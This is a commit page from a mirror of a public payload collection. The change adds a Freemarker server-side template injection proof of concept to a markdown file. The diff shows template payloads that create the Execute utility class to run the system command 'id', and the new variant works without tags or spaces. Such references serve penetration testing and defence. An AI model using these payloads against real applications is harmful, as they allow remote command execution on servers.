mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Merge pull request #75 from scarvell/master
Added Freemarker SSTI PoC that doesn't require the use of "tags"/spaces
This commit is contained in:
commit
1cec6e9a35
@ -150,6 +150,7 @@ The template can be `${3*3}` or the legacy `#{3*3}`
|
||||
```js
|
||||
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
|
||||
${"freemarker.template.utility.Execute"?new()("id")}
|
||||
```
|
||||
|
||||
## Jade / Codepen
|
||||
|
Loading…
Reference in New Issue
Block a user